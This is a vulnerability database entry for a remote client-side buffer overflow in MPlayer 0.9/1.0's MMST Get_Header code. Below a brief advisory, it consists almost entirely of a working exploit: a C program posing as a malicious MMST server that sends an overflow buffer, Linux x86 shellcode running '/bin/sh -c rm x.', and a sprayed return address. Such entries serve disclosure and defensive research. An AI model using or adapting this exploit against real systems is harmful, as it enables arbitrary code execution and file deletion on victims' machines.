MPlayer 0.9/1.0 MMST Get_Header Remote Client-Side Buffer Overflow Vulnerability

2014-07-01T00:00:00
ID SSV:78540
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/11962/info

A remote, client-side buffer overflow vulnerability reportedly affects MPlayer. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into static process buffers.

An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation.

char payload[] = {
 0xeb ,0x47
 ,0x59
 ,0x89 ,0xca
 ,0x83 ,0xc2 ,0x18
 ,0x89 ,0x11
 ,0x31 ,0xc0
 ,0x89 ,0x41 ,0x04
 ,0x83 ,0xc2 ,0x13
 ,0x89 ,0x51 ,0x08
 ,0x83 ,0xc2 ,0x08
 ,0x89 ,0x51 ,0x0c
 ,0x83 ,0xc2 ,0x03
 ,0x89 ,0x51 ,0x10
 ,0x89 ,0x41 ,0x14
 ,0x88 ,0x41 ,0x2a
 ,0x88 ,0x41 ,0x32
 ,0x88 ,0x41 ,0x35
 ,0x88 ,0x41 ,0x3a
 ,0x51
 ,0x83 ,0xc1 ,0x08
 ,0x51
 ,0x83 ,0xc1 ,0x20
 ,0x83 ,0xc1 ,0x03
 ,0x51
 ,0x83 ,0xc0 ,0x3b
 ,0x50
 ,0xcd ,0x80
 ,0x31 ,0xc0
 ,0x50
 ,0x40
 ,0x50
 ,0xcd ,0x80
 ,0xe8 ,0xb4 ,0xff ,0xff ,0xff
 ,0x61 ,0x62 ,0x63 ,0x64 ,0x65 ,0x66
 ,0x67 ,0x68 ,0x69 ,0x6a ,0x6b ,0x6c
 ,0x6d ,0x6e ,0x6f ,0x70 ,0x71 ,0x72
 ,0x73 ,0x74 ,0x75 ,0x76 ,0x77 ,0x78
 ,0x50 ,0x41 ,0x54 ,0x48 ,0x3d ,0x2f
 ,0x62 ,0x69 ,0x6e ,0x3a ,0x2f ,0x75
 ,0x73 ,0x72 ,0x2f ,0x62 ,0x69 ,0x6e
 ,0x20 ,0x2f ,0x62 ,0x69 ,0x6e ,0x2f
 ,0x73 ,0x68 ,0x20 ,0x2d ,0x63 ,0x20
 ,0x72 ,0x6d ,0x20 ,0x78 ,0x2e
} ;

#include <stdio.h>

main()
{

char buf[256];
int len;
int s,i;
len=recv(0,buf,256,0);
 
printf("hello\n");
fflush(stdout);   
 
len=recv(0,buf,256,0);
 
printf("hello\n");
fflush(stdout);   
 
len=recv(0,buf,256,0);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
fflush(stdout);
 
len=recv(0,buf,256,0);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
for (i=0;i<50000;i++) 
        putchar('A');
for (i=0;i<sizeof payload;i++)
        putchar (payload[i]);

printf("123");
for (i=0;i<20000;i++)           // RA all the way....
{
        putchar(0x01);
        putchar(0x15);
        putchar(0xbb);
        putchar(0xbf);
}
fflush(stdout);
}